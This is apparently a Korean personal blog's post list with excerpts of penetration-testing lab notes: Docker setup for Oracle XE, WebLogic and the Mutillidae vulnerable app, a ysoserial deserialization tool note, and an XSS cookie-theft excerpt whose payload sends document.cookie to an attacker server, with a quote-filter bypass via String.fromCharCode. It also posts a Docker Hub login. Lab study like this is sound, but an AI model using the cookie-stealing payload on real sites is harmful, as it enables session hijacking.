목록전체 글 (276)
의미없는 블로그
보호되어 있는 글입니다.
참고 : https://hub.docker.com/r/wnameless/oracle-xe-11g-r2 이미지 다운로드 docker pull wnameless/oracle-xe-11g-r2:latest 컨테이너 생성 docker run -it -d -P --expose="1521" --expose="8080" -e ORACLE_ALLOW_REMOTE=true --name oracle wnameless/oracle-xe-11g-r2:latest 8080(32768) 포트는 관리 Web 콘솔 http://도커아이피:8080/apex/apex_admin 접속 (ADMIN/admin) 직접 쿼리 사용하려면 컨테이너 들어가서 docker exec -u 0 -it oracle /bin/bash su oracle sq..
참고 : https://hub.docker.com/_/oracle-weblogic-server-12c 이미지 다운로드 docker pull store/oracle/weblogic:12.2.1.3-dev-190111 현재 디렉터리에 domain.properties 생성 weblogic 계정정보 작성 컨테이너 생성 docker run -d -p 7001:7001 -p 9002:9002 -v $PWD:/u01/oracle/properties store/oracle/weblogic:12.2.1.3-dev-190111 https://도커아이피:9002/console 접속
그냥 인프라 테스트용.. 이라 볼 수 있는 별로 쓸모없는 모듬구이 도커 로그인 후 이미지 다운로드하여 사용 docker login (hilee/pen) 기본적으로 OS는 CentOS 6.7 (cat /etc/redhat-release) [CON1] 이미지 다운로드 docker pull hilee/docker:con1 컨테이너 생성 docker run -it -d -P --expose="80" --expose="8080" --expose="3306" --expose="5450" --name con1 hilee/docker:con1 /bin/bash 컨테이너 들어가기 docker exec -u 0 -it con1 /bin/bash 구분 종류 버전 설치 경로/Webapps 실행 Apache WEB 2.2.15..
자바 직렬화/역직렬화 라고 해서 자바 객체를 Stream 형식으로 해서 전송 가능한 형태로 만드는게 직렬화 그 반대가 역직렬화 인 것 같은데 직렬화/역직렬화 할 때 취약점 발생 포인트가 있나보다 그걸 사용한 취약점 검증 툴 이라고 하네? 잘 모르겠고 RCE 취약점 검증할 때 가끔 쓰이길래 정리쓰 참고 : https://github.com/frohoff/ysoserial 다운로드 : https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar 참고에 github 들어가서 download 받을 수 있다(ysoserial-master-SNAPSHOT.jar) 웹로직에서 RCE 테스트 해보기 아래 파일은 ..
보호되어 있는 글입니다.
참고 : https://hub.docker.com/r/bltsec/mutillidae-docker Apache : /opt/lampp/bin# ./httpd -v MariaDB : /opt/lampp/bin# ./mysql -v OpenSSL : /opt/lampp/bin# openssl version PHP : /opt/lampp/bin# ./php -v 1. 이미지 다운로드 docker pull bltsec/mutillidae-docker 2. 컨테이너 생성 docker run -it -d -P --expose="80" --expose="443" --name owasp17 bltsec/mutillidae-docker:latest /bin/bash 3. 컨테이너 들어가기 docker exec -u 0 ..
쿠키 탈취 스크립트는 보통 이거 쓰는데 싱글쿼터나 더블쿼터 막혀있으면 이렇게 아스키값으로 쓰면 된다 아스키 변환 사이트는 여기고 https://www.easycalculation.com/ascii-hex.php 이렇게 괄호 안의 값 아스키로 변환해서 넣으면 된다 String.fromCharCode(document.location="http://test.com/test.php?cookie="+document.cookie;) 1) 공격자가 자신의 서버(150.24.95.134)에 쿠키값 탈취하는 페이지(test.php) 생성한다 2) test.php 작성하고 cookie.txt 만들어 놓기 3) XSS 존재하는 페이지에 악성 스크립트 삽입 시도 (공격자 서버로 쿠키값 보내는 스크립트) [원래 스크립트] [아..